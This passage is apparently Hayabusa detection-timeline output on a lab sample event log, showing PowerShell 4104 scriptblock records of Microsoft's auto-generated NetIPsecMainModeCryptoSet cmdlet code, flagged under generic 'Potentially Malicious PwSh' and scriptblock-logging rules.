($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_retur",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.611 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"nt} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, 
$__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecMainModeCryptoSet' -Alias '*' function Remove-NetIPsecMainModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxMinutes}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxSessions}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${ForceDiffieHellman}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] 
[ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) 
$__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('MaxMinutes') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxMinutes}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeMinutes', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MaxSessions') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxSessions}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeSessions', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('ForceDiffieHellman') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForceDiffieHellman}) $__cmdletization_queryBuilder.FilterByProperty('ForceDiffieHellman', $__cmdletization_values, $false, 'Default') } if 
($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_retur",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.611 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"nValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml } 
Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecMainModeCryptoSet' -Alias '*' function Rename-NetIPsecMainModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxMinutes}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxSessions}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${ForceDiffieHellman}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, 
[Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', 
$__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('MaxMinutes') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxMinutes}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeMinutes', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MaxSessions') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxSessions}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeSessions', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('ForceDiffieHellman') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForceDiffieHellman}) $__cmdletization_queryBuilder.FilterByProperty('ForceDiffieHellman', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParam",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.611 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"nValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecMainModeCryptoSet' -Alias '*' function Rename-NetIPsecMainModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] 
[OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxMinutes}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxSessions}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${ForceDiffieHellman}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] 
[string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] 